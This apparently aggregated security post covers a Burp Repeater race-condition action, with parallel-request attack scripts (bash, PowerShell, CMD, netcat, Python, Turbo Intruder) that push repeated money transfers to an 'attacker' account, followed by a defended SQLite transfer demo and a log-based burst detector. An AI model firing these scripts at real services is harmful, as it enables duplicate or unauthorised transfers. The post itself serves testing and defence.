Race Condition Custom Action for Burp Repeater

James Kettle, Director of Research at PortSwigger, has developed a custom action to test for race conditions with a single click in Burp Repeater. This tool leverages the cutting-edge single-packet attack technique, eliminating the need for tab groups.

You Should Know:

How to Install & Use the Custom Action

  1. Install Extensibility Helper (Burp Extension) to load the custom script.
  2. Copy the Python code from the GitHub Gist.
  3. Paste into Burp’s Extender → Add → New (Python).
  4. Run the action directly from Burp Repeater.

Testing Race Conditions Manually (Linux/Windows Commands)

Linux (Bash) – Parallel Requests

for i in {1..50}; do curl -X POST "http://target.com/transfer?amount=100&to=attacker" & done

Windows (PowerShell) – Race Attack

1..50 | ForEach-Object { Start-ThreadJob -ScriptBlock { Invoke-WebRequest -Uri "http://target.com/transfer?amount=100&to=attacker" -Method POST } }

Burp Suite Intruder (Turbo Intruder Alternative)

def queueRequests(target, wordlists):
    # Ten connections; every request is held behind a gate so they are released together
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)
    # Content-Length matches the 33-byte body (Turbo Intruder also recomputes it by default)
    request = '''POST /balance/transfer HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

from=user&to=attacker&amount=1000'''
    for i in range(20):
        engine.queue(request, gate='race1')
    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    # Turbo Intruder requires this callback; it adds each response to the results table
    table.add(req)

Single-Packet Attack (Advanced Race Condition Exploit)

This technique bypasses traditional mitigations by sending multiple requests in a single TCP packet, increasing success rates.

What Undercode Say

Race conditions remain a critical vulnerability in web applications, particularly in financial transactions, account takeovers, and inventory manipulation. Automation tools like Burp’s custom action simplify exploitation, but manual testing ensures deeper validation.

Additional Commands & Tools

  • Linux (netcat for low-level race testing):

    # Content-Length is required, otherwise the server never reads the body
    echo -e "POST /api/transfer HTTP/1.1\r\nHost: target.com\r\nContent-Length: 10\r\n\r\namount=100" | nc target.com 80 &

  • Windows (curl in CMD for rapid requests):

    for /L %i in (1,1,20) do curl -X POST http://target.com/transfer --data "from=victim&to=attacker&amount=100"

  • Python (Multi-threaded Race Testing):

    import threading
    import requests

    def race_request():
        requests.post("http://target.com/transfer", data={"amount": 100, "to": "attacker"})

    threads = [threading.Thread(target=race_request) for _ in range(20)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

Mitigation Strategies

  • Use server-side locks (e.g., database row locking).
  • Implement idempotency tokens in critical operations.
  • Apply rate limiting on sensitive endpoints.
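The first two mitigations in this list can be shown side by side. The example below is added here and is not part of the original post or of PortSwigger's tooling; it uses a throw-away SQLite file as a stand-in for the transfer endpoint's database (an assumption, as are the account names, the `idempotency` table and the 20-request burst). The unsafe function does a check-then-act in two statements, so every concurrent request sees the same balance; the hardened function takes the write lock up front with `BEGIN IMMEDIATE`, folds the balance check into the debit statement, and records an idempotency key so a replayed request is rejected.

```python
import os
import sqlite3
import tempfile
import threading
import time
import uuid


def fresh_db(start_balance=100):
    """Create a throw-away SQLite file with two accounts and an idempotency-key table (constructed demo data)."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    con = sqlite3.connect(path)
    con.executescript(
        """
        CREATE TABLE accounts (id TEXT PRIMARY KEY, balance INTEGER NOT NULL);
        CREATE TABLE idempotency (key TEXT PRIMARY KEY);
        """
    )
    con.execute("INSERT INTO accounts VALUES ('sender', ?), ('receiver', 0)", (start_balance,))
    con.commit()
    con.close()
    return path


def transfer_unsafe(path, frm, to, amount, idem_key=None):
    """Vulnerable pattern: read the balance, decide, then write, with no lock in between."""
    con = sqlite3.connect(path, timeout=5, isolation_level=None)  # autocommit, one statement at a time
    try:
        (bal,) = con.execute("SELECT balance FROM accounts WHERE id=?", (frm,)).fetchone()
        if bal < amount:
            return "insufficient"
        time.sleep(0.05)  # widen the race window so the demo is visible
        con.execute("UPDATE accounts SET balance = balance - ? WHERE id=?", (amount, frm))
        con.execute("UPDATE accounts SET balance = balance + ? WHERE id=?", (amount, to))
        return "ok"
    finally:
        con.close()


def transfer_safe(path, frm, to, amount, idem_key):
    """Hardened pattern: serialised writers, atomic check-and-debit, idempotency key."""
    con = sqlite3.connect(path, timeout=5, isolation_level=None)
    try:
        con.execute("BEGIN IMMEDIATE")  # take the write lock now; other writers queue behind it
        try:
            con.execute("INSERT INTO idempotency(key) VALUES (?)", (idem_key,))
        except sqlite3.IntegrityError:  # this request was already applied once
            con.execute("ROLLBACK")
            return "duplicate"
        # the balance check and the debit are a single atomic statement
        cur = con.execute(
            "UPDATE accounts SET balance = balance - ? WHERE id=? AND balance >= ?",
            (amount, frm, amount),
        )
        if cur.rowcount != 1:
            con.execute("ROLLBACK")
            return "insufficient"
        con.execute("UPDATE accounts SET balance = balance + ? WHERE id=?", (amount, to))
        con.execute("COMMIT")
        return "ok"
    finally:
        con.close()  # closing with an open transaction rolls it back


def race(path, fn, n=20, amount=100):
    """Fire n concurrent transfers (like the parallel requests above); return outcome counts and balances."""
    results = []
    lock = threading.Lock()

    def worker():
        r = fn(path, "sender", "receiver", amount, str(uuid.uuid4()))
        with lock:
            results.append(r)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    con = sqlite3.connect(path)
    balances = dict(con.execute("SELECT id, balance FROM accounts"))
    con.close()
    return {"ok": results.count("ok"), "insufficient": results.count("insufficient"), **balances}


if __name__ == "__main__":
    print("unsafe:", race(fresh_db(), transfer_unsafe))  # sender typically ends far below zero
    print("safe:  ", race(fresh_db(), transfer_safe))    # exactly one transfer succeeds
```

The conditional `UPDATE ... WHERE balance >= ?` is the part that survives even if the lock is dropped: with 100 in the account, only one of twenty concurrent debits of 100 can match the predicate, so the invariant holds regardless of scheduling. The lock is still wanted so that the idempotency insert and the debit commit together.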

Expected Output:

  • Successful race conditions result in duplicate transactions, unauthorized balance transfers, or privilege escalation.
  • Logs should show parallel request processing with inconsistent state changes.
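The second bullet describes what a defender should look for in access logs. The following detection logic is added here as an example and is not part of the original post; the log format (ISO timestamp with milliseconds, client address, method, path, status) and every log line are constructed for the demo. It groups requests by client, method and path and slides a fixed window over each group's timestamps, so a burst of identical requests inside a few milliseconds is flagged while the same client repeating the request seconds later is not.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample access log (not from any real system): timestamp, client, method, path, status.
SAMPLE_LOG = """\
2024-05-01T12:00:00.012Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.014Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.015Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.017Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.019Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.021Z 203.0.113.5 POST /transfer 200
2024-05-01T12:00:00.900Z 192.0.2.10 GET /balance 200
2024-05-01T12:00:01.000Z 198.51.100.7 POST /transfer 200
2024-05-01T12:00:02.300Z 192.0.2.10 GET /balance 200
2024-05-01T12:00:03.000Z 198.51.100.7 POST /transfer 200
2024-05-01T12:00:05.000Z 203.0.113.5 POST /transfer 200
"""


def parse_line(line):
    """Split one log line into (timestamp, client, method, path, status)."""
    ts, client, method, path, status = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
    return when, client, method, path, int(status)


def find_bursts(lines, window_ms=100, threshold=5):
    """Return (client, method, path, count) for groups with >= threshold requests inside one window_ms span.

    A sliding window over each group's sorted timestamps gives the largest number of
    requests that fit in window_ms; isolated repeats seconds apart do not accumulate.
    """
    groups = defaultdict(list)
    for line in lines:
        if line.strip():
            when, client, method, path, _status = parse_line(line)
            groups[(client, method, path)].append(when)

    findings = []
    for key, stamps in groups.items():
        stamps.sort()
        start = 0    # left edge of the sliding window
        largest = 0  # most requests seen inside one window
        for end, when in enumerate(stamps):
            while (when - stamps[start]).total_seconds() * 1000 > window_ms:
                start += 1
            largest = max(largest, end - start + 1)
        if largest >= threshold:
            findings.append((*key, largest))
    return findings


if __name__ == "__main__":
    for client, method, path, count in find_bursts(SAMPLE_LOG.splitlines()):
        print(f"possible race attempt: {count} x {method} {path} from {client} within 100 ms")
```

Pair the burst alert with the application's own state: a flagged group whose responses were all `200` on an endpoint that should only succeed once per balance is the "inconsistent state change" the bullet refers to, and is worth reconciling against the ledger.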

For deeper exploitation, refer to the full research paper.

Reported By: James Kettle – Hackers Feeds